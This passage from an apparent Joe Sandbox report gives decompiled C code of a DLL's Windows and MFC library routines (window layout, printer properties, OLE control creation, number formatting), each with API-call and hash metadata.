                                                                                                            				void* _v40;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t61;
                                                                                                            				int _t62;
                                                                                                            				signed short _t63;
                                                                                                            				void* _t64;
                                                                                                            				void* _t72;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				signed int _t87;
                                                                                                            				struct HWND__* _t91;
                                                                                                            				void* _t92;
                                                                                                            
                                                                                                            				_t72 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = _a28;
                                                                                                            				_v16 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				if(_a24 == 0) {
                                                                                                            					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                                                                                            				} else {
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            				}
                                                                                                            				_t61 = _a16 & 0xffff7fff;
                                                                                                            				_a24 = _t61;
                                                                                                            				if(_t61 == 1) {
                                                                                                            					_v40 = _v40 & 0x00000000;
                                                                                                            				} else {
                                                                                                            					_v40 = BeginDeferWindowPos(8);
                                                                                                            				}
                                                                                                            				_t62 = GetTopWindow( *(_t72 + 0x1c));
                                                                                                            				while(1) {
                                                                                                            					_t91 = _t62;
                                                                                                            					if(_t91 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t63 = GetDlgCtrlID(_t91);
                                                                                                            					_push(_t91);
                                                                                                            					_t87 = _t63 & 0x0000ffff;
                                                                                                            					_t64 = E10022115();
                                                                                                            					if(_t87 != _a12) {
                                                                                                            						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
                                                                                                            							SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_v8 = _t91;
                                                                                                            					}
                                                                                                            					_t62 = GetWindow(_t91, 2);
                                                                                                            				}
                                                                                                            				if(_a24 != 1) {
                                                                                                            					if(_a12 != 0 && _v8 != 0) {
                                                                                                            						_t62 = E100220EE(_t92, _v8);
                                                                                                            						if(_a24 == 2) {
                                                                                                            							_t85 = _a20;
                                                                                                            							_v36.left = _v36.left +  *_t85;
                                                                                                            							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                                                            							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                                                            							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                                                            						}
                                                                                                            						if((_a17 & 0x00000080) == 0) {
                                                                                                            							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                                                            							_t62 = E10020D81( &_v40, _v8,  &_v36);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_v40 != 0) {
                                                                                                            						_t62 = EndDeferWindowPos(_v40);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_a28 == 0) {
                                                                                                            						_t62 = _a20;
                                                                                                            						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                                                            						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                                                            						 *_t62 = 0;
                                                                                                            						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                                                            					} else {
                                                                                                            						_t62 = CopyRect(_a20,  &_v36);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t62;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • GetClientRect.USER32 ref: 100224CC
                                                                                                            • BeginDeferWindowPos.USER32 ref: 100224E4
                                                                                                            • GetTopWindow.USER32(?), ref: 100224F6
                                                                                                            • GetDlgCtrlID.USER32 ref: 10022501
                                                                                                            • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 10022533
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1002253C
                                                                                                            • CopyRect.USER32 ref: 1002255A
                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 100225D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1228040700-0
                                                                                                            • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                                                            • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				short _v528;
                                                                                                            				short _v1048;
                                                                                                            				short _v1568;
                                                                                                            				intOrPtr _t18;
                                                                                                            				int _t20;
                                                                                                            				int _t21;
                                                                                                            				void* _t23;
                                                                                                            				char* _t32;
                                                                                                            				int _t37;
                                                                                                            				char* _t42;
                                                                                                            				void* _t47;
                                                                                                            				void* _t49;
                                                                                                            
                                                                                                            				_t18 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t42 = _a4;
                                                                                                            				_v8 = _t18;
                                                                                                            				if(lstrcmpiA(_t42, _a8) == 0) {
                                                                                                            					_t20 = GetSystemMetrics(0x2a);
                                                                                                            					if(_t20 != 0) {
                                                                                                            						_t21 = lstrlenA(_t42);
                                                                                                            						if(_t21 != lstrlenA(_a8)) {
                                                                                                            							L13:
                                                                                                            							_t23 = 0;
                                                                                                            						} else {
                                                                                                            							_t37 = GetThreadLocale();
                                                                                                            							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
                                                                                                            							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
                                                                                                            							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
                                                                                                            							_t32 = _t42;
                                                                                                            							if( *_t42 == 0) {
                                                                                                            								L10:
                                                                                                            								_t23 = 1;
                                                                                                            							} else {
                                                                                                            								_t47 = 0;
                                                                                                            								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
                                                                                                            									_t47 = _t47 + 2;
                                                                                                            									if( *_t32 != 0) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L10;
                                                                                                            									}
                                                                                                            									goto L11;
                                                                                                            								}
                                                                                                            								goto L13;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L11:
                                                                                                            					} else {
                                                                                                            						_t23 = _t20 + 1;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t23 = 0;
                                                                                                            				}
                                                                                                            				return E100117AE(_t23, _v8);
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            • GetSystemMetrics.USER32 ref: 10025388
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystemlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2335526769-0
                                                                                                            • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                                                            • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001F60C(void* __ecx, char* _a4) {
                                                                                                            				void* _v8;
                                                                                                            				void* _t15;
                                                                                                            				void* _t20;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				_t15 =  *(__ecx + 0x70);
                                                                                                            				if(_t15 != 0) {
                                                                                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                            					if(_t15 == 0) {
                                                                                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                            						if(_t15 != 0) {
                                                                                                            							_t18 =  *(_t35 + 0x6c);
                                                                                                            							if( *(_t35 + 0x6c) != 0) {
                                                                                                            								E10029C1B(_t18);
                                                                                                            							}
                                                                                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                            							 *(_t35 + 0x6c) = _t20;
                                                                                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                            								E10029C1B( *(_t35 + 0x6c));
                                                                                                            								 *(_t35 + 0x6c) = 0;
                                                                                                            							}
                                                                                                            							_t15 = ClosePrinter(_v8);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t15;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F629
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F679
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                                                              • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                                                              • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                                                              • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                                                            • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E100074F2(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t132;
                                                                                                            				int* _t133;
                                                                                                            				int _t138;
                                                                                                            				intOrPtr* _t139;
                                                                                                            				int _t142;
                                                                                                            				int* _t143;
                                                                                                            				int _t146;
                                                                                                            				int _t171;
                                                                                                            				intOrPtr _t172;
                                                                                                            				int _t173;
                                                                                                            				intOrPtr _t178;
                                                                                                            				int _t183;
                                                                                                            				int _t186;
                                                                                                            				void* _t187;
                                                                                                            				int* _t191;
                                                                                                            				void* _t213;
                                                                                                            				int* _t216;
                                                                                                            				short _t217;
                                                                                                            				intOrPtr* _t225;
                                                                                                            				void* _t227;
                                                                                                            				struct tagRECT _t228;
                                                                                                            				int* _t229;
                                                                                                            				signed int _t233;
                                                                                                            				int* _t235;
                                                                                                            				int* _t237;
                                                                                                            				int* _t238;
                                                                                                            				void* _t239;
                                                                                                            
                                                                                                            				_t227 = __esi;
                                                                                                            				E10011BF0(0x1003a548, _t239);
                                                                                                            				_t132 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t225 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                                            				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
                                                                                                            				_t183 = 0;
                                                                                                            				_t133 = _t225 + 0x12;
                                                                                                            				 *(_t239 - 0x34) = _t133;
                                                                                                            				if( *(_t239 + 0x10) != 0) {
                                                                                                            					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
                                                                                                            					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
                                                                                                            					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
                                                                                                            					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
                                                                                                            					 *((short*)(_t239 - 0x4a)) =  *_t133;
                                                                                                            					_t216 = _t225 + 0x18;
                                                                                                            					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
                                                                                                            					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
                                                                                                            					_t225 = _t239 - 0x58;
                                                                                                            					 *(_t239 - 0x34) = _t216;
                                                                                                            				}
                                                                                                            				_t217 =  *((short*)(_t225 + 0xa));
                                                                                                            				_push(_t227);
                                                                                                            				_t228 =  *((short*)(_t225 + 8));
                                                                                                            				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
                                                                                                            				 *(_t239 - 0x68) = _t228;
                                                                                                            				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
                                                                                                            				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
                                                                                                            				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
                                                                                                            				_t229 =  *(_t239 + 0x1c);
                                                                                                            				 *(_t239 - 0x28) = _t183;
                                                                                                            				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
                                                                                                            					_t186 =  *_t229;
                                                                                                            					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
                                                                                                            					_t229 =  &(_t229[1]);
                                                                                                            					if(_t186 > 0) {
                                                                                                            						__imp__#4(_t229, _t186);
                                                                                                            						_t187 = _t186 + _t186;
                                                                                                            						_t229 = _t229 + _t187;
                                                                                                            						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
                                                                                                            						 *(_t239 - 0x28) = _t138;
                                                                                                            					}
                                                                                                            					_t183 = 0;
                                                                                                            				}
                                                                                                            				 *(_t239 - 0x2c) = _t183;
                                                                                                            				_t139 = E100243B2();
                                                                                                            				_t218 =  *_t139;
                                                                                                            				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
                                                                                                            				 *(_t239 - 4) = _t183;
                                                                                                            				 *(_t239 - 0x38) = _t183;
                                                                                                            				 *(_t239 - 0x3c) = _t183;
                                                                                                            				 *(_t239 - 0x30) = _t183;
                                                                                                            				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
                                                                                                            					_t142 =  *_t229;
                                                                                                            					_t49 = _t142 - 0xc; // -28
                                                                                                            					_t191 = _t49;
                                                                                                            					_t229 =  &(_t229[3]);
                                                                                                            					 *(_t239 - 0x40) = _t142;
                                                                                                            					 *(_t239 + 0x1c) = _t191;
                                                                                                            					if(_t191 > _t183) {
                                                                                                            						do {
                                                                                                            							_t171 =  *_t229;
                                                                                                            							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
                                                                                                            							_t235 =  &(_t229[1]);
                                                                                                            							_t229 =  &(_t235[0]);
                                                                                                            							 *(_t239 - 0x44) = _t171;
                                                                                                            							 *(_t239 + 0x10) =  *_t235;
                                                                                                            							if(_t171 != 0x80010001) {
                                                                                                            								_t172 = E1001F77E(0x1c);
                                                                                                            								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
                                                                                                            								__eflags = _t172 - _t183;
                                                                                                            								 *(_t239 - 4) = 1;
                                                                                                            								if(_t172 == _t183) {
                                                                                                            									_t173 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            								} else {
                                                                                                            									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
                                                                                                            								}
                                                                                                            								 *(_t239 - 4) = 0;
                                                                                                            								 *(_t239 - 0x2c) = _t173;
                                                                                                            							} else {
                                                                                                            								_t237 =  &(_t229[1]);
                                                                                                            								 *(_t239 - 0x3c) =  *_t229;
                                                                                                            								_t238 =  &(_t237[3]);
                                                                                                            								 *(_t239 - 0x30) =  *_t237;
                                                                                                            								E10006AEC(_t239 + 0x14, _t238);
                                                                                                            								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
                                                                                                            								_t213 = 0xffffffef;
                                                                                                            								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
                                                                                                            								_t229 = _t238 + _t178 + 1;
                                                                                                            								 *(_t239 - 0x38) =  *(_t239 + 0x10);
                                                                                                            							}
                                                                                                            						} while ( *(_t239 + 0x1c) > _t183);
                                                                                                            						_t142 =  *(_t239 - 0x40);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
                                                                                                            					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
                                                                                                            				}
                                                                                                            				_t143 =  *(_t239 - 0x34);
                                                                                                            				_t256 =  *_t143 - 0x7b;
                                                                                                            				_push(_t239 - 0x20);
                                                                                                            				_push(_t143);
                                                                                                            				if( *_t143 != 0x7b) {
                                                                                                            					__imp__CLSIDFromProgID();
                                                                                                            				} else {
                                                                                                            					__imp__CLSIDFromString();
                                                                                                            				}
                                                                                                            				_push(_t183);
                                                                                                            				_push( *((intOrPtr*)(_t239 + 0x20)));
                                                                                                            				_push(_t229);
                                                                                                            				 *(_t239 + 0x1c) = _t143;
                                                                                                            				E1002EC6C(_t239 - 0x94, _t256);
                                                                                                            				 *(_t239 - 4) = 2;
                                                                                                            				 *(_t239 - 0x24) = _t183;
                                                                                                            				asm("sbb esi, esi");
                                                                                                            				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
                                                                                                            				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
                                                                                                            					E1000A762( *(_t239 - 0x24), 1);
                                                                                                            					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
                                                                                                            					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
                                                                                                            					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
                                                                                                            					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
                                                                                                            					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
                                                                                                            					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
                                                                                                            				}
                                                                                                            				if( *(_t239 - 0x28) != _t183) {
                                                                                                            					__imp__#6( *(_t239 - 0x28));
                                                                                                            				}
                                                                                                            				_t146 =  *(_t239 - 0x24);
                                                                                                            				if(_t146 == _t183) {
                                                                                                            					 *( *(_t239 + 0x24)) = _t183;
                                                                                                            				} else {
                                                                                                            					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
                                                                                                            					_t183 = 1;
                                                                                                            				}
                                                                                                            				 *(_t239 - 4) = 0;
                                                                                                            				E1002EFD7(_t183, _t239 - 0x94, _t218);
                                                                                                            				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
                                                                                                            				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
                                                                                                            			}































                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100074F7
                                                                                                            • MapDialogRect.USER32(?,?), ref: 10007585
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                                                            • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                                                            • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                                                            • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 493809305-0
                                                                                                            • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                                                            • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 73%
                                                                                                            			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v9;
                                                                                                            				signed int _v10;
                                                                                                            				signed int _v14;
                                                                                                            				signed int _v18;
                                                                                                            				signed short _v20;
                                                                                                            				char _v21;
                                                                                                            				char _v22;
                                                                                                            				char _v23;
                                                                                                            				char _v24;
                                                                                                            				char _v25;
                                                                                                            				char _v26;
                                                                                                            				char _v27;
                                                                                                            				char _v28;
                                                                                                            				char _v29;
                                                                                                            				char _v30;
                                                                                                            				char _v31;
                                                                                                            				char _v32;
                                                                                                            				char _v44;
                                                                                                            				signed int _v48;
                                                                                                            				signed short* _v52;
                                                                                                            				intOrPtr _t87;
                                                                                                            				signed int _t88;
                                                                                                            				signed short* _t99;
                                                                                                            				intOrPtr* _t100;
                                                                                                            				signed int _t101;
                                                                                                            				signed short _t103;
                                                                                                            				signed int _t105;
                                                                                                            				signed short* _t131;
                                                                                                            				signed int _t133;
                                                                                                            				signed int _t139;
                                                                                                            				signed short* _t141;
                                                                                                            				signed short _t149;
                                                                                                            				signed int _t151;
                                                                                                            				signed int _t152;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t164;
                                                                                                            				void* _t165;
                                                                                                            				void* _t166;
                                                                                                            
                                                                                                            				_t87 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t87;
                                                                                                            				_t88 = _a12;
                                                                                                            				_t131 = _a24;
                                                                                                            				_t133 = _t88 & 0x00008000;
                                                                                                            				_v32 = 0xcc;
                                                                                                            				_v31 = 0xcc;
                                                                                                            				_v30 = 0xcc;
                                                                                                            				_v29 = 0xcc;
                                                                                                            				_v28 = 0xcc;
                                                                                                            				_v27 = 0xcc;
                                                                                                            				_v26 = 0xcc;
                                                                                                            				_v25 = 0xcc;
                                                                                                            				_v24 = 0xcc;
                                                                                                            				_v23 = 0xcc;
                                                                                                            				_v22 = 0xfb;
                                                                                                            				_v21 = 0x3f;
                                                                                                            				_v48 = 1;
                                                                                                            				_t149 = _t88 & 0x00007fff;
                                                                                                            				if(_t133 == 0) {
                                                                                                            					_t131[1] = 0x20;
                                                                                                            				} else {
                                                                                                            					_t131[1] = 0x2d;
                                                                                                            				}
                                                                                                            				_t151 = _a8;
                                                                                                            				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
                                                                                                            					if(_t149 != 0x7fff) {
                                                                                                            						_t90 = _t149 & 0x0000ffff;
                                                                                                            						_v20 = _v20 & 0x00000000;
                                                                                                            						_v18 = _a4;
                                                                                                            						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
                                                                                                            						_v10 = _t149;
                                                                                                            						_v14 = _t151;
                                                                                                            						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
                                                                                                            						_t166 = _t165 + 0xc;
                                                                                                            						__eflags = _v10 - 0x3fff;
                                                                                                            						if(_v10 >= 0x3fff) {
                                                                                                            							_t159 = _t159 + 1;
                                                                                                            							__eflags = _t159;
                                                                                                            							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
                                                                                                            						}
                                                                                                            						__eflags = _a20 & 0x00000001;
                                                                                                            						_t152 = _a16;
                                                                                                            						 *_t131 = _t159;
                                                                                                            						if((_a20 & 0x00000001) == 0) {
                                                                                                            							L27:
                                                                                                            							__eflags = _t152 - 0x15;
                                                                                                            							if(_t152 > 0x15) {
                                                                                                            								_t152 = 0x15;
                                                                                                            							}
                                                                                                            							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
                                                                                                            							_t52 =  &_v10;
                                                                                                            							 *_t52 = _v10 & 0x00000000;
                                                                                                            							__eflags =  *_t52;
                                                                                                            							_a12 = 8;
                                                                                                            							do {
                                                                                                            								E1001B6CD( &_v20);
                                                                                                            								_t56 =  &_a12;
                                                                                                            								 *_t56 = _a12 - 1;
                                                                                                            								__eflags =  *_t56;
                                                                                                            							} while ( *_t56 != 0);
                                                                                                            							__eflags = _t161;
                                                                                                            							if(_t161 < 0) {
                                                                                                            								_t164 =  ~_t161 & 0x000000ff;
                                                                                                            								__eflags = _t164;
                                                                                                            								if(_t164 > 0) {
